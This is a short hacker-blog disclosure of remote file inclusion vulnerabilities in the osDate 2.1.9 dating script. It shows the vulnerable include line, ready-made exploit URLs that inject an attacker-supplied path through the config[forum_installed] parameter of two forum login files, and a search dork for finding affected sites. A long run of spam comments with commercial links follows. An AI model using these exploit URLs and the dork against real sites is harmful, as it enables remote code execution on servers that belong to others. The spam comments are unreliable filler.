osDate RFI Vuln


[o] osDate Remote File Inclusion Vulnerabilities
Software : osDate dating and matchmaking script version 2.1.9 [mostly affected]
Vendor : http://www.tufat.com/
Download : http://www.tufat.com/s_free_dating_system.htm
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/


[o] Vulnerable file
include_once($config['forum_installed'] . "_forum.php");
forum/adminLogin.php
forum/userLogin.php


[o] Exploit
http://localhost/[path]/forum/adminLogin.php?config[forum_installed]=[evilc0de]
http://localhost/[path]/forum/userLogin.php?config[forum_installed]=[evilc0de]


[o] Dork
"powered by osdate"


57 Responses so far.

  1. It is a standard protocol that defines how webserver software can delegate.

  2. joe says:

    Nice post. I was checking continuously this blog and I am impressed! Extremely helpful information particularly the last part :) I care for such information a lot. I was looking for this certain information for a very long time. Thank you and best of luck.

  3. I believe the key is in being passionate about what you write, being focused, and being dedicated to get the work done. Of course, you an write about pretty much any topic, but you need to have faith and ability to get the job done.

  4. This post is useful for my research writing, thanks!
    Dissertation Writers | dissertation proposal

  5. You got a really useful blog I have been here reading for about an hour. I am a newbie and your success is very much an inspiration for me.

  6. I admire the valuable information in this page. I will bookmark this page and have my friends check up here often. I am quite sure they will learn lots of new stuff here than anybody else!

  7. duoderm says:

    I must appreciate you for the information you have shared.I find this information very useful and it has considerably saved my time thanks..!!

  8. Hair says:

    You have done a great job. Like it

    Debt Consolidation

  9. I am extremely delighted to be on this site reading some top quality stuff. Thanks for sharing.

  10. juliawells says:

    Input passed to the "config[forum_installed]" parameter in forum/adminLogin.php and forum/userLogin.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources.
    Teamwear Football

  11. good post. I was very encouraged to find this site. come on.

  12. I really loved reading your blog. It was very well authored and easy to understand. Unlike additional blogs I have read which are really not good. I also found your posts very interesting. In fact after reading, I had to go show it to my friend and he enjoyed it as well!

    Dunlop Motorcycle Tires | Bridgestone Motorcycle Tires

  13. You made some good quality points there. I did a search on the topic and found many people will agree with your blog.

    Send a Gift to Pakistan | Send Gifts to Pakistan | Send Flowers to Pakistan

  14. Hello, U write some extraordinarily attractive blogs. I always check back here frequently to see if you have updated

    Dunlop Tires Dubai | Industrial Batteries in Dubai | Michelin Tires in Dubai

  15. I was searching for that post quick a long time... fortunately I found it on right time...Thanks again for sharing

    Dubai Blinds | Blinds Dubai | Roman Blinds

  16. This is really my very first time here, great looking blog. I discovered so many interesting things inside your blog especially its discussion.

    Atlanta General Contractor | Atlanta Bathroom Remodeling | Atlanta Remodeling Contractors

  17. It is really nice to hear your discussion on specific topic here. I too agree with your points here. keep posting good blogs. Thanks

    Stereotactic Surgery in Tennessee | Tennessee Neurosurgeon Information | Tennessee Spinal Surgeon

  18. I really prize your work , Great post. Generally I do not read article on blogs, however I wish to say that this write-up very forced me to check out and do so! Your writing taste has been amazed me. Thanks, very great post.

    Atlanta Holiday Party Locations | Atlanta Christmas Party Locations | Atlanta Christmas Party Venues

  19. elviswilliams says:

    Well NoGe has discovered some vulnerabilities in osDate, which can be exploited by malicious people to compromise a vulnerable system.
    Security training courses in barking | Door Supervision training | Security SIA Training

  20. elviswilliams says:

    Thanks for a great blog. I was ab
    le to get the information that I had been looking for. Thanks once again!
    Security Guarding barkingn

  21. sandrasteve says:

    Good post....thanks for sharing.. very useful for me i will bookmark this for my future needed.thanks for a great source.
    Where to Sell Gold
    Cash Gold
    Price of gold per gram

  22. Happy to see your blog as it is just what I’ve looking for and excited to read all the posts. I am looking forward to another great article from you.

  23. Thanks for this read mate. Well, this is my first visit to your blog! But I admire the precious time and effort you put into it, especially into interesting articles you share here!

  24. weight loss programs mn

    It's good to read this information from your post. You have an interesting way of drawing people in. Keep up the good works..

  25. I like this post. I want to more information about this topic and now, I got all information by your post. Everything define in this post is awesome. I think you should make more post which helps us.

  26. Nice information, valuable and excellent design, as share good stuff with good ideas and concepts, lots of great information and inspiration.

  27. navaneedh says:

    Hi there, awesome site. I thought the topics you posted on were very interesting. I tried to add your RSS to my feed reader and it a few. take a look at it, hopefully I can add you and follow.





    UK Assignment Help

  28. I like your article so that I read all of your articles in a day. Please continue and keep on writing excellent posts.
    send gifts to pakistan

  29. wad jason says:

    This really is an awesome post, I’m happy I recently found.I am looking forward for your next post.
    essay writing service in uk

  30. jakhoz says:

    I hardly ever write comments on blogs, but your article urged me to praise your blog. Thanks for the read, I will surely favorite your site and check in occasionally.

    essay writing help | essay writing service | cheap essay writing | affordable essay writing

  31. hey that's really a great post and i like this and thanks for sharing it with us!I have read a few of the articles on your website now because I was looking for information about games App. and I really like your style of blogging.

  32. Howdy! This is kind of off topic but I need some guidance from an established blog. Is it difficult to set up your own blog? I’m not very techincal but I can figure things out pretty quick. I’m thinking about setting up my own but I’m not sure where to start. Do you have any tips or suggestions? With thanks

  33. jakhoz says:

    Awesome content, beneficial give good results, now I am aware that which you guys have been doing all this time.
    do my essay for me | write my essay

  34. I got all information by your post. Everything define in this post is awesome.

  35. I would like to thank you for sharing your thoughts and time into the stuff posted!

  36. I tried to add your RSS to my feed reader and it a few.

  37. Curtains Dubai said:

    Just a quick note to say how pleased I am with my new articles. Fast replys, easy site to use - well done to all of you. Will definitely save you in favorites

    Curtains Dubai | Dubai Curtains | Roman Blinds Dubai | Upholstery and Sofa

  38. Hot Deals says:

    I also want to share my views on this as it is the best option for all of us if we work on the advice of the author of this article. It will be beneficial for us.

  39. This really is an awesome post, I’m happy I recently found.I am looking forward for your next post."
    Window Tinting Company

  40. Hi,
    I am very thankful too you for this sharing..It is very useful for my writing project I get enough information for my writing..!!!
    Coaching Training

  41. I love this type of informative blog very much.Traffic War Games

  42. This post is informative for me and all other readers.iPhone Combat Games

  43. Quickly, your article is in fact the most beneficial subject matter on this related difficulty. My partner and i remain in your own a conclusion and will thirstily anticipate your current approaching messages. Just indicating thanks won't just be enough, to the incredible lucidity inside your composing. I will simultaneously grab ones rss feed to stay up-to-date with just about any changes.Sending Cakes To Pakistan

  44. TIDE APP says:

    Good stuff. It is interesting to read comments.TIDE APP

  45. Very nice post. Its was informative and interesting keep posting.

  46. Civil Construction Courses says:

    Comfortabl y, the article is really the best on this worthw hile topic.Civil Construction Courses

  47. I share this information quite a bit so I thought it would be helpful to me as well to have some of the best pins in one post.

  48. Thanks for an idea, you sparked at thought from a angle I hadn’t given thoguht to yet. Now lets see if I can do something with it.

  49. Junaid says:

    I must appreciate you for the information you have shared.I find this information very useful and it has considerably saved my time thanks..!!

    Send Gifts to Pakistan

  50. Junaid says:

    Nice post. I was checking continuously this blog and I am impressed! Extremely helpful information particularly the last part :) I care for such information a lot. I was looking for this certain information for a very long time. Thank you and best of luck.

    Send Gifts to Pakistan

  51. Junaid says:

    It is a standard protocol that defines how webserver software can delegate

    Send Gifts to Pakistan